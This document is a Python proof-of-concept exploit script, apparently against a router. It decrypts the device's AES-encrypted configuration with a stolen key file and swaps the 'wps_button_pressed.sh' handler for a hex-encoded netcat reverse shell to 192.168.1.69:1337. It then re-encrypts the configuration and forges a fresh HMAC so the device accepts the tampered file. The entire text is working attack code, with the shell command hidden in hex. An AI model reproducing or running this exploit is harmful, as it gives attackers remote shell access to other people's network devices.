exploit_config.py

#!/usr/bin/env python3
# poc config injection exploit

from Crypto.Cipher import AES
import hmac
import hashlib

try:
	inputkey = open ("proc_rip_0108", "rb")
except:
	print ("Cannot open encryption key file ./proc_rip_0108")
	exit()

try:
	inputfile = open ("config.bin", "rb")
except:
	print ("Cannot open file ./config.bin")
	exit()

# reverse shell on 192.168.1.69:1337
payload = "6e63203139322e3136382e312e36392031333337202d65202f62696e2f7368207c7c2074727565"

hmac_key = inputkey.read()
aes_key = hmac_key[:32]

config = inputfile.read()

sz = len(config)
header_end = config.find(b"\n\n") + 2
header_data = config[:header_end]
iv_end = header_end + 16
aes_end = sz - 20
iv = config[header_end:iv_end]
aes_data = config[iv_end:aes_end]
hmac_data = config[aes_end:]

print ("File size: " + str(sz))
print ("IV " + str(len(iv)) + " " + iv.hex())
print ("HMAC " + str(len(hmac_data)) + " " + hmac_data.hex())
print ("AES data " + str(len(aes_data)))

# decrypt
cipher_dec = AES.new (aes_key, AES.MODE_CBC, iv)
decrypted_raw = cipher_dec.decrypt (aes_data)

# remove padding
decrypted = decrypted_raw[:-decrypted_raw[-1]]
decrypted_file = open("config.txt", "w")
decrypted_file.write(decrypted.decode("utf-8"))
decrypted_file.close()

# patch
patched = decrypted.replace (b"wps_button_pressed.sh", bytes.fromhex(payload))
patch_file = open("config_patched.txt", "w")
patch_file.write(patched.decode("utf-8"))
patch_file.close()

# add padding
patched_len = len(patched) % 16
if patched_len:
	add_pad = 16 - patched_len
	pad = add_pad * chr(add_pad)
	patched += bytes(pad, "utf-8")

# encrypt
cipher_enc = AES.new (aes_key, AES.MODE_CBC, iv)
encrypted = cipher_enc.encrypt (patched)

# calc new hmac
hmac_new = hmac.new(hmac_key, header_data + iv + encrypted, digestmod=hashlib.sha1).digest()

out = open ("config_patched.bin", "wb")
out.write(header_data)
out.write(iv)
out.write(encrypted)
out.write(hmac_new)
out.close()

print ("Written config_patched.bin")